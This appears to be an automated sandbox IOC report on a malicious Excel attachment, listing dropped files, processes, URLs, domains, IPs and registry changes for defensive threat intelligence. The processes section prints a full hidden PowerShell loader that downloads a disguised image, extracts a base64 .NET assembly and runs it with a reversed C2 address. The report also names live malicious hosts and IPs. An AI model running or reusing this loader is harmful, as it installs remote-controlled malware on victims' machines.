IOC Report
#20240627_Edlen_A.xls

Files

File Path
Type
Category
Malicious
#20240627_Edlen_A.xls
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Sun May 26 18:29:10 2024, Security: 1
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl[1].doc
ISO-8859 text, with very long lines (1707), with CRLF, CR, LF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1B25204E.doc
ISO-8859 text, with very long lines (1707), with CRLF, CR, LF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{D9BCE685-2557-45B4-B3BC-EEF401A63014}.tmp
Composite Document File V2 Document, Cannot read section info
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\nXPJ.url
MS Windows 95 Internet shortcut text (URL=<http://z2.ink/nXPJ>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\z2.ink.url
MS Windows 95 Internet shortcut text (URL=<http://z2.ink/>), ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Roaming\rugtucw
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD (copy)
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Bo3r4[1].txt
ASCII text, with very long lines (11472), with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lionarekingofjungleimageshere[1].bmp
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5C434091.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\61AE6F44.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7BF22ED0.emf
Windows Enhanced Metafile (EMF) image data version 0x10000
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2D2A1F64-27D8-4507-A763-F5114DB22C88}.tmp
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F791DA79-78F1-4AE5-808F-463F6AF8FA08}.tmp
data
dropped
C:\Users\user\AppData\Local\Temp\1ws4m3m4.xs5.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\2kro4ew5.lct.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\BC5.tmp
SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
dropped
C:\Users\user\AppData\Local\Temp\F8D.tmp
SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
dropped
C:\Users\user\AppData\Local\Temp\FF56.tmp
SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Temp\mfe1q2ow.ix3.psm1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\tmn44ujy.e4g.ps1
very short file (no magic)
dropped
C:\Users\user\AppData\Local\Temp\{2178790F-B770-41BF-8744-4B796E955306}
data
dropped
C:\Users\user\AppData\Local\Temp\{B33A6DEA-0735-487B-B176-36E55809ABF7}
data
dropped
C:\Users\user\AppData\Local\Temp\~DF2D116EC66936C416.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFBC2F112CC991C446.TMP
data
dropped
C:\Users\user\AppData\Local\Temp\~DFF92B5CC893CED70F.TMP
data
dropped
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Generic INItialization configuration [xls]
modified
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
C:\Users\user\AppData\Roaming\sfwjhij
data
dropped
C:\Users\user\Desktop\#20240627_Edlen_A.xls (copy)
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 17:35:43 2024, Security: 1
dropped
C:\Users\user\Desktop\26330000
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon May 27 17:35:43 2024, Security: 1
dropped
C:\Users\user\Desktop\26330000:Zone.Identifier
ASCII text, with CRLF line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
malicious
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
malicious
C:\Windows\SysWOW64\wscript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshe.vbs"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = '[encoded payload removed]';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
malicious
C:\Windows\explorer.exe
C:\Windows\Explorer.EXE
malicious
C:\Users\user\AppData\Roaming\rugtucw
C:\Users\user\AppData\Roaming\rugtucw
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
malicious
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe
malicious
C:\Windows\System32\taskeng.exe
taskeng.exe {2B2AF159-87EA-4DB0-87E1-2E594ED3F3FE} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]

URLs

Name
IP
Malicious
http://198.46.177.156/8080/lionarekingofjungleimageshere.bmp
198.46.177.156
malicious
http://198.46.177.156/8080/RBG.txt
198.46.177.156
malicious
http://prolinice.ga/index.php
77.232.129.190
malicious
http://vilendar.ga/index.php
malicious
https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634
188.114.97.3
malicious
https://paste.ee/d/Bo3r4
188.114.96.3
malicious
http://prolinice.ga/
unknown
malicious
https://uploaddeimagens.com.br
unknown
malicious
http://198.46.177.156/xampp/msdc/lionsarebeautifultoruletheforestandtheyalwayskingogthejunglewhoneverknowmanythingkingisrigerbutlionisthekingo__junglelionbeautiufl.doc
198.46.177.156
malicious
https://duckduckgo.com/chrome_newtab
unknown
http://prolinice.ga/ndex.php
unknown
https://duckduckgo.com/ac/?q=
unknown
http://ocsp.entrust.net03
unknown
https://contoso.com/License
unknown
http://crl.use
unknown
https://paste.ee/n
unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
https://analytics.paste.ee
unknown
http://www.diginotar.nl/cps/pkioverheid0
unknown
https://paste.ee/e
unknown
https://www.google.com
unknown
http://aikpfjvjuwcsxfjs.net/application/x-www-form-urlencodedMozilla/5.0
unknown
https://contoso.com/
unknown
https://nuget.org/nuget.exe
unknown
http://aikpfjvjuwcsxfjs.net/
unknown
http://www.autoitscript.com/autoit3
unknown
https://cdnjs.cloudflare.com
unknown
https://cdnjs.cloudflare.com;
unknown
http://ocsp.entrust.net0D
unknown
http://z2.ink/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
https://secure.gravatar.com
unknown
http://prolinice.ga/index.php.
unknown
http://www.piriform.com/ccleanerxe
unknown
http://nuget.org/NuGet.exe
unknown
http://crl.entrust.net/server1.crl0
unknown
https://www.google.com;
unknown
https://contoso.com/Icon
unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
unknown
https://paste.ee/d/Bo3r4gj
unknown
https://www.google.com/favicon.ico
unknown
https://ac.ecosia.org/autocomplete?q=
unknown
http://java.sun.com
unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
unknown
https://analytics.paste.ee;
unknown
http://www.piriform.com/ccleaner
unknown
http://198.46.177.156/8080/lionarekingofjungleimageshere.bmpj
unknown
https://support.mozilla.org
unknown
http://prolinice.ga/index.phpMozilla/5.0
unknown
https://secure.comodo.com/CPS0
unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
unknown
https://themes.googleusercontent.com
unknown
http://crl.entrust.net/2048ca.crl0
unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
unknown

Domains

Name
IP
Malicious
paste.ee
188.114.96.3
malicious
z2.ink
54.241.153.192
malicious
uploaddeimagens.com.br
188.114.97.3
malicious
prolinice.ga
77.232.129.190
malicious

IPs

IP
Domain
Country
Malicious
54.241.153.192
z2.ink
United States
malicious
77.232.129.190
prolinice.ga
Russian Federation
malicious
188.114.97.3
uploaddeimagens.com.br
European Union
malicious
188.114.96.3
paste.ee
European Union
malicious
198.46.177.156
unknown
United States
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8
Blob
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C
Blob
malicious
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
%e(
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Excel
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\26873
26873
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
%j(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33717
33717
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\33801
33801
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\3383F
3383F
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Security\Trusted Documents
LastPurgeTime
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
EXCELFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
74$
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Outlook\Journaling\Microsoft Word
Enabled
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
o5$
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://z2.ink/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
iz$
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Max Display
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 1
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 3
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 4
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 5
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 6
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 8
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 9
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 10
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 11
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 12
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 13
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 14
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 15
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 16
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 17
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 18
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 19
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\file mru
Item 21
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\2F3D1
2F3D1
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
